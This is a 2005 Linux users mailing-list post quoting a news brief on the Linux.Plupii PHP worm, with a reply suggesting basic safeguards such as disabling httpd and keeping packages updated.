Linux worm crawls the web, what to do to protect our systems
James Kosin
jkosin at beta.intcomgrp.com
Mon Nov 7 22:48:21 UTC 2005
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
Antonio Olivares wrote:
>Dear List,
> A strange worm is going around the web. It attacks
>some vulnerabilities in PHP.
>
>>From
>http://www.securityfocus.com/brief/38?ref=rss
>
>cut+paste here
>=====================================================
>A new Linux worm is crawling the web looking for a
>large number of vulnerable PHP systems and
>applications. The worm, known as Linux.Plupii
>(Symantec) or Linux/Lupper.worm (McAfee), is rated as
>a Category 2 worm by Symantec, while McAfee considers
>the risk "low." The worm installs a Trojan using wget
>and the attack allows for arbitrary code execution
>under the privileges of the web server user.
>
> The worm exploits PHP based vulnerabilities
>discovered back in June, and affects a large number of
>PHP web applications that use XML-RPC. The Trojan
>makes simple requests to web servers running on port
>80 and the attack has been well documented by SANS.
>Unpatched systems are ripe for exploitation. Affected
>systems will need to be wiped and have the OS
>reinstalled, in most cases.
>
> The report comes on the heels of a new PHP release
>that addresses more security issues. Readers are also
>reminded of the Perl-based Santy worm and its variants
>as an indication that web-based worms that target
>Linux and Unix applications are becoming much more
>commonplace.
>
>=====================================================
>
>what can we do to escape the threat of this worm.
>Does it need root priviledge? I am asking this
>because it is an eminent danger and how to secure our
>pcs.
>
>Thanks,
>
>Antonio
>
>
>
>
>__________________________________
>Yahoo! FareChase: Search multiple travel sites in one click.
>http://farechase.yahoo.com
>
I wouldn't overreact...
I believe this has been taken care of some time ago. FC1 doesn't have
the exploit and I'm sure FC4 definitely does not.
Safeguards:
- ------------
(1) Unless the PC is a server; disable the httpd service.
(2) Check the PC for the files they are trying to access commonly.
If the php files are not there they can't affect your system.
(3) Keep your packages updated. If not posted to bugzilla try
posting this there. Security issues are important if not noticed and
acted upon.
Thanks,
James Kosin
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFDb9m1kNLDmnu1kSkRA8eWAJ4sPXHCSHzkrmh7R3Zt6/HlmWMIggCfQblp
sw7v+oF0uatbIkTUMoMi0/Q=
=E1PX
-----END PGP SIGNATURE-----
--
Scanned by ClamAV - http://www.clamav.net
More information about the users
mailing list